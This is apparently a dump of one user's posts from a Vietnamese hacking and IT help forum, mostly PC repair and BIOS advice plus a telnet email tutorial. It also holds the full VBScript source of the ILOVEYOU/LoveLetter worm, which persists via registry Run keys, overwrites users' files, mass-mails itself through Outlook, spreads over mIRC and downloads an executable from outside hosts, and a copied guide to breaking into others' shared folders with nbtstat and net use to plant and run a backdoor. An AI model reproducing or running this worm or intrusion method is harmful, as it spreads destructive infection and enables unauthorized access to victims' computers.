|
|
louisenguyen wrote:
Em cung bị lỗi tương tự , bác post cách help em với
Mình repair thế nào à . Bạn cho đĩa cài Windows vào và chọn Install ( Upgrade chứ không phải new Install nha ) rồi đợi khoảng 20' thì xong. Vậy thôi ) ) )
|
|
|
low1059 wrote:
Tôi đã cài xong ISS và chạy asp bình thường, nhưng khi cài thêm php vào thì không chạy được, các bác có thể chỉ giúp cấu hình của ISS để chạy php.
Cảm ơn !
Bạn có thể tham khảo ở đây.
http://www.diendantinhoc.net/tute/hethong/IIS-Perl-PHP-MySQL-duyson/
|
|
|
bk2000 wrote:
máy mình tự nhiên hiện màn hình màu xanh có mấy dong" dump physical memory......(
Đoạn này mình nghĩ là do RAM bị lỗi nên bạn thử kiểm tra lại RAM xem sao .Mình nghĩ máy chạy rất chậm cũng có thể là do nguyên nhân này.
ko thể vào bios, mình bỏ đĩa win vào cài lại thì báo là ko co hard disk drives và ko cho cài win. Sau đó, mình tháo pin bios ra thì vào được win nhưng cũng rất chậm, mình thử gắn pin vào lại hoặc thay đổi bios ( ngày, giở)
Ko vào được Bios thì hơi lạ đấy Ko nhẽ lại nói BIOS có vấn đề.
Nếu bạn kiểm tra Ram mà ko sao thì tớ nghĩ là đến việc kiểm tra lại Main rồi, đi ra hàng xem nó sửa thế nào
// Hôm trước mình cũng có thằng bạn bị như vậy ,cho đĩa WINDOWS vào mà ko cài được ( cũng báo lỗi y như bạn mô tả ) cuối cùng nó mang đi bảo hành Đổi con Main mới
Bạn thử nhé xem có ăn thua gì ko .
|
|
|
zombie01 wrote:
Máy của em khi bật lên thì thấy báo " CMOS Chesksum error_Defaults loaded " rồi im re. Ai biết xin chỉ giùm.
Mình thì nghĩ rằng :
Thay vì đi mua Pin mới như mấy bạn kia nói
Thì ta cứ thử cách này xem sao có mất gì đâu nào:
B1: Bật máy
B2 : Nhấn Del( F2) // Tức là vào Bios
B3: Chọn phần Load Default config.
B4: Save and Restart
B5: Nếu mà vẫn báo như trên thì đi mua PIN thôi ( còn ko thì ta lại dùng tiếp sợ gì nào ) ) ) ) )
|
|
|
DigitalLove wrote:
Cho mình hỏi làm cách nào để tắt chức năng Wake on LAN? Mình chẳng biết BIOS là gì cả, hic. Lại còn CMOS nữa. Rối tung lên.
Thế này nhé.
B1 : Bạn cắm điện
B2 : Nhấn Power
B3 : Nhìn ngồi nhìn màn hình khởi động .( thông thường thì chỉ cần nhấn nút DEL (delete) là vào Bios , đôi khi nhấn F2 ,) Trên màn hình sẽ có chỉ dẫn nhấn vào phím nào thì vào Bios.
B4 : Sau khi vào Bios thì tìm phần Wake on lan chỉnh lại thôi ( Cứ hí hoáy nghịch tí đi ko sợ đâu có gì thiết lập sai ko chạy nữa thì tháo pin( hoặc gạt nẫy reset) ra nhờ nó reset lại Bios là xong)
B5 : Sau khi chỉnh xong nhớ save lại và Restart .
B6 : Ngồi chơi xơi nước vào Windows làm việc tiếp ..
) ) ) ) )
|
|
|
Ngày hôm nay lúc vào forum tự dưng lại tháy cái thông tin này . Lạ thế
Em mới chỉ chuyển từ trang 2 về trang 1 thế mà báo đọc bằng vận tốc anh sáng
bác conmale xem thế nào thế
:lol :lol :lol
|
|
|
Như tiêu đề của topic mình đang cần tìm vài cuốn sách.
1 cẩm nang lập trình hệ thống ( 2 tập)
2 lý thuyết Mã
3 internet và tường lửa
nếu bạn nào có thì có thể share cho mình được không. Cám ơn nhiều
|
|
|
bạn có thể upload lên www.dturboupload được không.
cả 2 cái trên toàn báo lỗi . 500 - Internal Server Error (cái dưới báo thế đấy)
|
|
|
hix hết lỗi đó nó đẻ ra thêm một đống lỗi khác như là : không cho tạo hay xóa account nào nữa ,Taskmanager không hiện user , lỗi lung tung , lại còn khởi động lại thì mất hết card sound , ethernet. ...
bực mình với nó mình đã dùng đĩa cài để repair lại và giờ có lẽ là ngon rồi he he chưa thấy hiện tượng gì .
|
|
|
Mình không biết vì sao ( không hiểu đã làm gì ,hay có bị nhiễm virus không ( hình như không phải do bị virus) ) tự nhiên tất cả ứng dụng đều không chạy trực tiếp được . các file .exe khi open đều hiện ra một bảng dạng (file không rõ và nó cho mình chọn ứng dụng để chạy file đó.
ví dụ mình chạy YIM nó hiện ra 1 bảng nếu chọn là ứng dụng là YIM thì vẫn chạy được.
sau rồi thử Run --> c: ( để đến ổ C) thì báo là c\windows\explorer.exe application not found.
hoặc c\windows\rundll32.exe application not found.
rõ ràng ở trogn đó vẫn có . mình thử chạy explorer.exe thì nó lại như kiểu một file lạ ,hiện lên bảng open để chọn ứng dụng thích hợp , thử browser vào thư mục windows chọn đúng nó ( explorer.exe) nhưng không được.
chả hiểu mô tê gì.
|
|
|
buicathung wrote:
Chào mừng HVA trở lại !!!!!!!!!
^^ he he lâu quá rồi mới HVA mới open trở lại ^^ Vụ này có khi lại phải làm quả offline để gắn bó đoàn kết cái nhỉ.
sau bao ngày xa cách HVA ( ban đầu ngày nào cũng nhấn xem HVA hồi phục chưa ) sau rồi lâu quá ,hôm nay nghĩ thế nào em nhấn vô HVA đã trở lại . Hix dạo này em cũng thế, cũng đã trở lại sau một thời lãng quên Hibernate chuyện học hỏi tìm tòi ( đi phưu lưu ái tình )
éc bây giờ lại trở lại ( hix tý thì quên cả password) dài quá may mà nhớ ra đăng nhập vào đây post bài .( chẳng biết bác nào còn nhớ mình không ) chắc chẳng còn ai.
THôi kệ em lại tham gia ,quả này phải cố gắng mới được 3 năm tranining skill.
Chúc mừng HVA comeback. ) ) ) )
Bác bùi cả thúng làm quả offline đê ,anh em gặp nhau đoàn kết. CÒn lão đấu với mình cốc rượu đâu rồi còn nhớ thằng em này không .
|
|
|
_VoT_ wrote:
Máy sử dụng win XP pack 2, vừa format lại ổ cứng và cài lại win .....nhưng làm xong thì ko sử dụng được net nữa. Mình đã kiểm tra dây và modem......ai có thể góp ý giúp được ko? Mình nghĩ là chưa cài driver cho card mạng...nhưng cài ntn ? Ai giúp với đc ko?
Kiểm tra dây và modem là như thế nào:
Bạn đã cấu hình lại modem chưa . nếu chưa thì làm đi đã..
|
|
|
oi_cuoc_doi wrote:
Máy tinh của mình mỗi khi bật thì xuất hiện :
CMOS/GPNV Checksum Bad
CMOS Date/Time Not Set
Press F4 to Setup
Mình đã kiểm tra Pin CMOS vẫn còn điện, Clear Jum CMOS, Cài lại Win.
Lần nào tắt điện bật máy lên đều bị như vậy. Sau 1 tuần bị như vậy thì 1 cái ổ cứng của minh đã bị tèo, kô biết có liên quan đên nhau kô?
Mọi người có kinh nghiệm giúp mình với.
Giờ sau khi thay HDD còn báo không
nói bảo chưa set thì mình vào set thôi : cứ vô setup đơn giản nhất là chọn chế độ default của nó là ổn mà. :lol :lol
|
|
|
dangkhs wrote:
Cho em hỏi: Telnet là gì? và tìm nó ở đâu?
Bạn vô windows nhấn (F1) gọi help và đánh vào chữ Telnet nó hướng dẫn rất cụ thể ( mọi thắc mắc sẽ được giải quyết )
Còn dưới đây là bài mình sưu tầm được bạn đọc qua xem sao.
--------------------------------------------------------------------------------
Tác giả :W_Hat
Cách sử dụng telnet và ứng dụng :
1- Giới thiệu:
Telnet là một chương trình cho phép bạn kết nối và đăng nhập vào một máy tính ở xa (trong LAN, internet). Khi kết nối thành công, máy tính của bạn sẽ thực hiện chức năng như trạm trung gian để gửi yêu cầu đến máy tính ở xa.
Bạn có thể dùng máy tính của mình để truy cập thông tin, thực thi các chương trình và sử dụng một số tài nguyên khác trên máy tính ở xa.
2- Sử dụng telnet:
Bắt đầu từ command prompt, gõ vào telnet, nếu bạn dùng 9x, nó sẽ đưa bạn vào trình windows telnet. Bạn cũng có thể chạy ở menu Start/Run.
Ở chế độ đánh lệnh, bạn có thể dùng các lệnh sau:
OPEN <hostname/site address> <port number> : mở một kết nốI đến máy tính ở xa, gọi là 1 telnet session
CLOSE : đóng kết nối và trở về dấu nhắc đợI lệnh
QUIT: đóng kết nối và thoát telnet
<ENTER> : nhấn phím enter sẽ đưa bạn thoát khỏI chế độ dấu nhắc lệnh và trở lại telnet session
SET ECHO: bật/tắt chế độ hiện các lệnh đánh vào trong windows telnet. Lưu ý trong 2k sẽ là SET LOCAL_ECHO
Để kết nối, ta dùng lệnh OPEN hoặc cũng có thể trực tiếp bằng lệnh
telnet <hostname/site address> <port number>
vd:
telnet anyhost.com 12345
Trying 123.123.112.12 port 12345
Connected to anyhost.com
Escape character is….
Sau khi kết nối xong, bạn đã ở trong một telnet session. Có thể dùng kí tự escape ở trên để trở về dấu nhắc lệnh.
3- Ứng dụng telnet để truy cập POP email:
a- Ðọc mail:
Các internet mail server cho phép truy cập thông qua giao thức POP (Post Office Protocol), cổng 110. Nếu POP server bạn đang dùng là anyhost.com, thì ta sẽ dùng lệnh sau: telnet anyhost.com 110
Một số các lệnh có thể bạn cần dùng khi truy cập POP email
USER <username> : mở hộp thư của username
PASS <password> : mật khẩu cho hộp thư
LIST : liệt kê các emails trong hộp thư
RETR <email number> : xem thư có thứ tự là number, được liệt kê trong lệnh LIST
TOP <email number> <message lines> : xem thư như RETR, nhưng dừng lại khi hiện được số dòng nhất định
DELE <email number> : xóa thư có thứ tự number
QUIT : đóng telnet session
Ví dụ, ta sẽ truy cập vào yahoo để xem mail, ta thực hiện lệnh:
telnet pop.mail.yahoo.com 110 <enter> và chờ một chút...
Nếu thành công, bạn sẽ nhận được dòng thông tin sau:
+OK hello from popgate
Kể từ đây, nếu trước khi mở 1 telnet session, bạn có dùng SET ECHO, thì những gì bạn đánh vào sẽ hiện lên, không thì bạn phải nhập các lệnh thật chính xác
Nhập tên user
USER w_hat95
+OK password required
Nhập mật khẩu
PASS anhyeuemnhieulam
+OK maildrop ready, 2 messages (2983 octets) (34232 2324232)
Ở đây, mail box của tôi có 2 tin, kế đến là tổng kích thước của các email, các số còn lại bạn không cần quan tâm
Bạn dùng lệnh list để liệt kê các email, bao gồm stt và size:
list
1 1728
2 1205
.
Ðể xem một mail có stt nào đó, bạn dùng lệnh retr <message number>
retr 1
Chờ một chút, bạn sẽ nhận được những thông tin đầy đủ về mail đó, bao gồm toàn bộ header và nội dung
vd:
+OK 1783 octets
X-Apparently-To: w_hat95@yahoo.com via web20306.mail.yahoo.com; 04 Jan 2002 23:4
8:08 -0800 (PST)
X-RocketRCL: 1037;1;2465408753
Received: from web11904.mail.yahoo.com (216.136.172.18)
by mta621.mail.yahoo.com with SMTP; 04 Jan 2002 23:48:08 -0800 (PST)
Message-ID: <20020105074808.35179.qmail@web11904.mail.yahoo.com>
Received: from [61.214.156.105] by web11904.mail.yahoo.com via HTTP; Fri, 04 Jan
2002 23:48:08 PST
Date: Fri, 4 Jan 2002 23:48:08 -0800 (PST)
From: Joel <joel@yahoo.com>
Subject: Re: hi?
To: F M <w_hat95@yahoo.com>
In-Reply-To: <20020102080654.68330.qmail@web20307.mail.yahoo.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-888944639-1010216888=:34368"
......vvv
.
Về những thông tin trong email header,bạn tự tìm hiểu lấy! )
Nếu những thông tin liệt kê ở trên quá nhiều, bạn không kịp xem, hãy dùng lệnh top <mess number> <showed lines> để liệt kê theo số lượng dòng nhất định
vd: top 1 10 -> sẽ liệt kê 10 dòng đầu (kể cả header) của email số 1, sau khi hiện xong 10 dòng cho bạn xem, chờ vài giây, nó sẽ tiếp tục hiện các dòng kế tiếp cho đến khi toàn bộ email được xem!?
Ðể xóa 1 email, bạn dùng lệnh dele <email number>
vd: dele 2 -> sẽ xóa email thứ 2 trong danh sách
Sau khi check xong emails, bạn đóng telnet session bằng lệnh QUIT, bạn sẽ được đưa về dấu nhắc lệnh
Bất lợi của việc check email POP dùng telnet là bạn không có được giao diện dễ nhìn như các trình check POP mail khác. Bạn cũng không thể trả lời từ các mail đã đọc được.
b- Gửi mail:
Tương tự như trên, các internet mail server sẽ cung cấp một giao thức là SMTP (Simple Mail Transfer Protocol) cho phép bạn send email thông qua server đó, cổng 25.
Một số lệnh bạn cần dùng:
HELO <hostname> : giới thiệu host, thông tin này không cần thiết
MAIL FROM: <email của người gửi>
RCPT TO: <emails của người nhận>
DATA <nhập data của bạn>: sau khi enter, bạn nhập nội dung email. Sau khi nhập xong, muốn kết thúc, bạn phải xuống hàng và nhập dấu chấm '.'
RSET xóa các thông tin lần gửi mới nhất, dùng khi bạn muốn gửi đến một người khác
QUIT : thoát
HELP <lệnh> xem trợ giúp về các lệnh, lệnh này tùy thuộc vào mail server bạn đang connect
Ví dụ, đối với yahoo:
Bạn thực hiện lệnh telnet smtp.mail.yahoo.com 25
Chờ một lúc, nếu kết nối thành công, bạn sẽ nhận được thông tin sau:
220 smtp011.mail.yahoo.com ESMTP
Kết nối:
helo smtp.mail.yahoo.com
250 smtp011.mail.yahoo.com
Nhập thông tin người gửi:
mail from: w_hat95@yahoo.com
250 ok
Nhập thông tin người nhận:
rcpt to: joel@yahoo.com Joel
250 ok
Nhập nội dung:
data blsdfsdfsd
354 go ahead
Subject: hi Joel, how r u these days?
Hi Joel,
R u busy this late evening?
If ur free, get to Mo^.ng Mo* bar. I need to talk to you.
See ya,
W_Hat
.
250 ok 1010373599 qp 48077
Ðóng telnet session
Quit
Bạn có thể thao khảo một ví dụ về send mail thông qua SMTP tại: http://www.kbcafe.com/articles/smtp.html
ps: các ví dụ trên đã test trên Windows 2000, các bạn có thể thực hiện tương tự trên Windows 9x. Tùy mail server mà các thông tin xác nhận và thông báo các lệnh của bạn có thể khác nhau.
--------------------------------------------------------------------------------
|
|
|
[b] code đây bác tham khảo ạ .
Code:
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / <a href="mailto:ispyder@mail.com">ispyder@mail.com</a> / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? <a href="mailto:ispyder@mail.com">ispyder@mail.com</a> ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<script language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<script LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
|
|
|
toolcracking wrote:
cái này free, xài khá được,giúp ích cho các bác trong footprinting stage.
nếu ai có zdu2i, cũng đừng phê bình.
http://rapidshare.de/files/29735743/Sam_Spade.exe
Cái này version bao nhiêu hả bác . Em thấy dùng cũng khá tốt )
|
|
|
Dạ em tìm thấy post lên để mọi người coi :Sưu tầm ạ.
Acess share file
Share file thì không cần phải nói ai cũng biết nhưng khi người ta share file là một cơ hội tốt để đột nhập của mình tính họ. Những chương trình đột nhập máy tính như backdoor thì tôi không phải giới thiệu các bạn đã biết . Tôi chỉ giới thiệu làm cách nào để chạy backdoor khi có share file .
Một số lệnh trong NetBios cũng rất hữu ích(các bạn tự tìm hiểu lấy) tôi chỉ nêu một số lệnh phục cho việc xem và access
Để lấy thông tin trên máy người share file thì
C:\> nbtstat -a <tên người share file>
-A <nhập IP>
Nó sẽ thông báo những thông tin về máy người này trên mạng
C:\> net view \<tên máy>
Nó sẽ hiển thị những thư mục mà người này share. Lệnh này chỉ có thể hiển thị những thư mục share không ẩn . Còn hiển thị tất cả các share ẩn thì dùng một số chương trình có ở những trang norton.com hay lockdown.com
Khi đã thấy share bạn dùng lệnh sau để tạo một ổ đĩa ảo trên máy mình
C:\> net use <tên ổ địa do mình muốn> : \\<IP>\<sharename>
Khi thực hiện được nó sẽ báo thành công ! Nếu như nó đòi pw khi truy nhập thì phải dùng chương trình có trang lockdown.com để lấy chương trình dò password share file Tôi có chương trình tên gì thì tôi quên rồi nhưng nếu bạn cần thì để tôi sẽ giới thiệu trang download sau.
Khi đã xâm nhập thành công , công việc còn lại chỉ là chép backdoor vào ổ đĩa ảo này và chạy backdoor
Để chạy được backdoor bạn phải chuyển sang ổ đĩa ảo mà bạn đã tạo và chép backdoor lên mà chạy.
-------------------------------------------------------------------------------------------------------------------------------
Vài options về NBT Viết tắt của NetBIOS over TCP/IP
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
ví dụ cụ thể:
>nbtstat -A 192.168.0.2
connect local area :
Node IpAddress: [192.168.0.2] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
AT-M3 <00> UNIQUE Registered
ATM <00> GROUP Registered
AT-M3 <03> UNIQUE Registered
AT-M3 <20> UNIQUE Registered
ATM <1E> GROUP Registered
ATM <1D> UNIQUE Registered
...<01> GROUP Registered
MAC Address = 00-10-DC-1F-CF-FA
Ý nghĩ của các chứ số nằm <XX>
00: base computernames and workgroups, also in "*" queries
01: master browser, in magic cookie
03: messaging/alerter service; name of logged-in user
20: resource-sharing "server service" name
1B: domain master-browser name
1C: domain controller name
1E: domain/workgroup master browser election announcement [?]
(sưu tầm)
|
|
|
conmale wrote:
Không phải không hiểu mà chưa thấy vì chưa mở mà em. Dự kiến phải 1/2 tháng nữa mới tạm đầy đủ cái sườn. Lúc ấy sẽ mở cửa cho các member elite.
Thân.
Thế ạ , thế thì em sẽ cố gắng phấn đấu để trở thành Elite member) .Lại những đêm không ngủ rồi đây.
|
|
|
boy9x wrote:
Ông bạn đã nói thế thì tui cũng nói thật nếu ông bạn đã không muốn trả lời câu hỏi của vinhhoxuan2005 thì thôi chứ sao ông bạn lại kêu người ta đọc lại nội quy
==> vậy xin hỏi ông bạn đã học thuộc lòng nội quy của diễn đàn chưa hay là không thèm đọc
Tôi có một phương châm thế này :
